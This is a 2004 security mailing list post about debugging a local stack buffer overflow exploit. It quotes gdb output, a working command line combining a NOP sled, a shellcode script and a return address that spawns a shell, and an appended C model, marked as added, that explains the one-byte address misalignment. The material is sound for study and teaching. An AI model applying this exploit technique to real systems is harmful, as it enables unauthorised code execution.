Re: Buffer Overflow problem
From: John Vill (kalookalaa_at_hotmail.com)
Date: 05/10/04
- Previous message: Andrej: "What´s the better choice -> debian / freebsd?"
- Maybe in reply to: John Vill: "Buffer Overflow problem"
- Next in thread: Krzysztof Godlewski: "Re: Buffer Overflow problem"
- Reply: Krzysztof Godlewski: "Re: Buffer Overflow problem"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: security-basics@securityfocus.com
Date: Mon, 10 May 2004 00:28:47 -0400
Hello,
Thanks for the reply, Krzysztof. My return address isn't incorrectly aligned,
as it is being put into the EIP the right way as I see it with the info
registers in gdb. If I add or subtract a NOP or two, "00" gets added to the
beginning or end of the address. For example 0xfff94b00 or 0x00bffff9, where
my address is 0xbffff94b. Or maybe it is the problem and I'm just not
understanding correctly?
I used this exact method for overflowing a larger buffer (500 or so) and it
works fine. I do not know why I'm getting Illegal Instruction. The address I'm
using is from:
    /* returns the current stack pointer (32-bit x86, GCC inline asm) */
    unsigned long sp(void) { unsigned long r; __asm__("movl %%esp, %0" : "=r"(r)); return r; }
I run that to get the addr and use that address. I haven't tried other
methods like the GOT, libc, or even dtors yet. I just have no clue why I'm
getting "Illegal Instruction" when the EIP is being overwritten with the
right address. I made sure to turn off all the stack protections and
everything... Can anyone tell me what "Illegal Instruction" is exactly? This
is frustrating =P
>Program received signal SIGSEGV, Segmentation fault.
>0x00bffff4 in ?? ()
>
>So I'm just one byte off from the correct location. Examining the stack
>proves that this is true:
>
>(gdb) x/4x $esp - 8
>0xbffff5a8: 0xa068732f 0x00bffff4 0x00000002 0xbffff5f4
>(gdb)
>
>The value 0xa06873f2 just before the return addr holds the missing part of
>my buffer's address. So all you have to do is move the entire address by one
>byte. So...
>
>Starting program: /home/kg/prog/sec/buf `perl -e 'print
>"\x90"x223'``./mkshell.pl``perl -e 'print "\xa6\xf4\xff\xbf"'`
>
>sh-2.05b$
>
>.. it works.
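Both the shifted EIP values John reports (0xfff94b00 / 0x00bffff9 for 0xbffff94b) and the "one byte off" diagnosis in Krzysztof's quoted reply are the same little-endian alignment effect: the 4-byte address starts one byte before or after the saved-return slot, so gdb shows it rotated by one byte with a stray filler or NUL byte on one end. The following C program is an added illustration, not code from either poster; it models a frame with a constructed slot offset and includes a small helper that, given the intended address and the value gdb shows in EIP, reports how many bytes of padding are missing or surplus.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model: the saved return address sits SLOT_OFFSET bytes into the
 * overflowed buffer; the payload is nop_count NOPs, a little-endian address,
 * and (as with argv) a terminating NUL. SLOT_OFFSET is not from the thread. */
#define SLOT_OFFSET 223u

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Value that lands in the saved EIP slot for a given amount of NOP filler. */
uint32_t saved_eip_for(size_t nop_count, uint32_t addr) {
    uint8_t frame[SLOT_OFFSET + 16];
    memset(frame, 0, sizeof frame);
    if (nop_count + 5 > sizeof frame) return 0;
    memset(frame, 0x90, nop_count);                 /* NOP sled */
    for (int i = 0; i < 4; i++)                     /* address, little-endian */
        frame[nop_count + i] = (uint8_t)(addr >> (8 * i));
    /* frame[nop_count + 4] stays 0x00: the string terminator */
    return read_le32(frame + SLOT_OFFSET);
}

/* Compare the intended address with what gdb shows in EIP. Returns k > 0 if
 * the address landed k bytes too early (add k filler bytes), k < 0 if it
 * landed k bytes too late (remove k), 0 if aligned, 99 if it is not a shift.
 * The bytes that spill in from either side (filler or NUL) are ignored. */
int eip_shift(uint32_t intended, uint32_t observed) {
    if (observed == intended) return 0;
    for (int k = 1; k <= 3; k++) {
        uint32_t low = 0xffffffffu >> (8 * k);          /* the 4-k low bytes */
        if ((observed & low) == (intended >> (8 * k))) return k;   /* too early */
        if ((observed >> (8 * k)) == (intended & low)) return -k;  /* too late */
    }
    return 99;
}

int main(void) {
    uint32_t target = 0xbffff94bu;                  /* John's address */
    for (size_t n = 222; n <= 224; n++) {
        uint32_t eip = saved_eip_for(n, target);
        printf("%zu NOPs -> saved EIP 0x%08x (shift %d)\n",
               n, eip, eip_shift(target, eip));
    }
    return 0;
}
```

With 222 NOPs the model reproduces John's 0x00bffff9 exactly (the NUL terminator fills the top byte); an EIP that starts on such a stray byte is why the CPU reports SIGILL or SIGSEGV instead of reaching the sled.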